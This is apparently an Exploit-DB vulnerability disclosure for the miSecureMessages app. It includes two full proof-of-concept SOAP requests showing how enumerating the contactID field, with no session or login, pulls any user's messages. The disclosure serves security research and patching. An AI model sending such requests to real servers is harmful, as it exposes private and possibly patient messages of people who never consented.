miSecureMessages 4.0.1 - Session Management / Authentication Bypass

EDB-ID:

33019




Platform:

Multiple

Date:

2014-04-25


Affected Product
==================================
miSecureMessages from Amtelco - Tested on version: Client=4.0.1
Server=6.2.4552.30017
iOS: https://itunes.apple.com/us/app/misecuremessages/id423957478?mt=8
android: https://play.google.com/store/apps/details?id=com.amtelco.secure
website: https://misecuremessages.com/

Product Description
==================================
miSecureMessages is a secure, two-way instant smartphone and tablet
messaging Android™ App that uses encryption to keep your messages private.
Messages can be sent securely from device to device, and by using the
secure cloud-based or on-site directory solution. When you receive a
message from miSecureMessages, a Persistent Alert notifies you until you
acknowledge the message. You can view the message, and quickly send a
secure reply. miSecureMessages is perfect for healthcare and medical
professionals to protect patient PHI, as well as industries that need
secure instant messaging.

Vulnerability Details
==================================
----------------------------------
Session Management Vulnerability
----------------------------------

miSecureMessages lacks any sort of session management. Among other things,
this allows any user to modify the xml requests to retrieve other users
messages.

PoC(1):

POST /msmwebservice/service.asmx HTTP/1.1
Host: misecureserver.localhost.com
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
Accept-Language: en-us
SOAPAction: http://amtelco.com/ssm/GetMessages
Connection: keep-alive
User-Agent: miSecureMessages/4.0.1 CFNetwork/672.0.8 Darwin/14.0.0


<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="
http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetMessages xmlns="http://amtelco.com/ssm/">
<folders>1</folders><contactID>1</contactID><unreadOnly>false</unreadOnly><license>XXXX.X.XXXX</license></GetMessages>
</soap:Body>
</soap:Envelope>

Due to the lack of session management, it is possible to change the
<contactID> value to any valid contact ID and retrieve all messages for the
user associated with that contact ID.



----------------------------------
Authentication bypass vulnerability
----------------------------------
Authentication is not required to access messages, only the input of a
valid "license key". By modifying and sequentially enumerating through the
<contactID> it is possible to retrieve all messages without authenticating.

PoC(2):

POST /msmwebservice/service.asmx HTTP/1.1
Host: misecureserver.localhost.com
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 473

<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="
http://www.w3.org/2003/05/soap-envelope">
  <soap12:Body>
    <GetMessages xmlns="http://amtelco.com/ssm/">
      <license>XXXX.X.XXXX</license>
      <contactID>1</contactID>
      <unreadOnly>false</unreadOnly>
      <folders>1</folders>
    </GetMessages>
  </soap12:Body>
</soap12:Envelope>